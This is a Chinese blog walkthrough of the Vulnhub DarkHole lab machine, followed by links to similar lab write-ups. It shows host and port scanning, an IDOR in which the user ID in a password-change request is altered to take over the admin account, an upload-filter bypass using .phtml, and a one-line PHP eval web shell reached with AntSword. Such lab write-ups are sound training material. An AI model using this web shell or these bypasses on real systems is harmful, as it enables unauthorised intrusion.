Vulnhub靶机: DarkHole

最新推荐文章于 2024-07-28 23:19:17 发布
最新推荐文章于 2024-07-28 23:19:17 发布
阅读量191 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sszsNo1/article/details/131500397
版权

一、靶机介绍

1、先从vulnhub下载靶场源码

下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip

2、下载完毕,出现以下的文件算完成,把它拖进虚拟机里

3、建议在当前目录下新建一个文件夹,用来存储导入数据

出现以下页面,填写虚拟机的名称,游览选择刚才新建的文件夹

二、信息搜集

1、扫描附近的主机(使用的是kali)

arp-scan -l

发现主机

2、端口扫描

nmap -sV -A -p 0-65535 192.168.66.133

可以看见开放了两个端口

访问一下80端口,发现点击右上角存在登录页面,还可以注册,等会没准用的着

3、目录扫描

可以使用kali自带的目录扫描工具

dirsearch -u http://192.168.66.133/

成功扫描出目录,把响应码为200的拿出来

[02:29:23] 200 -  948B  - /config/
[02:29:24] 200 -   21B  - /dashboard.php                                    
[02:29:28] 200 -  810B  - /index.php                                        
[02:29:28] 200 -  810B  - /index.php/login/                                 
[02:29:29] 200 -    1KB - /js/                                              
[02:29:30] 200 -    2KB - /login.php          
[02:29:36] 200 -    3KB - /register.php  
[02:29:41] 200 -  933B  - /upload/

尝试访问一下,看看哪些有用

发现/upload/路径下可能存储照片的,等会没准用的上

三、利用之前搜索到的信息,开始寻找漏洞点

1、利用之前搜索到的登录和注册页面,发现不知道账户和密码,那就注册一个

使用注册的用户登录进去

发现可以修改密码,尝试能不能抓包修改管理员admin的密码

2、使用抓包工具Burp,进行抓包修改密码

输入要修改的密码,点击修改时进行抓包

抓到包修改身份标识的ID

修改完毕,尝试进行登录

发现登录成功,不愧是管理员用户,多出一个上传功能,又多一个测试的

3、尝试进行上传

先上传1.jpg试试水

点击上传时进行抓包,修改文件后缀名为.php,内容以下

<?php phpinfo();?>

发现不让上传,有限制

接下来尝试其他后缀名绕过

终于发现.phtml可以绕过

抓包修改

发现这回上传成功

图片是上传了,可是不知道路径呀,这时候就体现出信息收集的用处了

之前就发现有个图片存储的路径,拿来尝试一下

发现上传的图片确实在里面

访问一下,发现成功出现phpinfo

4、上传shell

内容以下

<?php eval($_POST['666']);?>

访问,出现空白,大概率是上传成功

使用中国蚁剑进行连接,密码为666

成功连接

sszsNo1
关注
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 1013
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
VulnHub DarkHole靶机
qq_39428734的博客
04-13 533
扫描局域网内存活主机 得到靶机IP 使用namp扫描存活靶机开放了哪些端口 得到靶机开放了22,80端口 进入80端口的网页服务 查看网页源代码没有发现任何东西 爆破目录,查看有那些敏感目录 看到了一个配置文件和后台管理界面,登录界面等等 在config目录里面查看到了database.php文件 我们把它下载下来 啥也没有。。 后台管理界面显示没有权限 登录界面中看到了 正式的登录界面 我们去注册界面看看 注册一个用户并登录试试
VulnHub靶机-SkyTower
Slow_的博客
02-26 755
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
VulnHub靶机入门篇--Kioptrix4
最新发布
2302_78903258的博客
07-28 1080
前面的知识点都跟之前题目差不多,后面出现了sql注入的利用,sqlmap工具的使用,以及获得webshell,在获得webshell之后的提权(数据库提权),以及一些linux的常用命令。
vulnhub靶机实战——W1R3S
weixin_30294295的博客
05-13 398
环境 靶机ip:192.168.163.132 攻击机ip:192.168.163.129 目的:拿下靶机并获得root权限 渗透 首先nmap扫描端口 nmap -sC -sV 192.168.163.132 可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。 首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有...
vulnhub靶机
weixin_43902100的博客
09-28 294
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
Vulnhub靶机
weixin_43902100的博客
09-21 674
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
Vulnhub系列--DARKHOLD:2
ch3cke的博客
03-29 3990
信息收集 主机信息收集: ┌──(kali㉿kali)-[~/Desktop/chall/vulnhub/DARKHOLE-2] └─$ nmap -sP 192.168.139.135/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 08:.
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4242
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1913
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2505
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 893
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Vulnhub靶机-PumpkinFestival
ergeLXT的博客
06-28 656
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 260
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 166
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1053
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1146
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值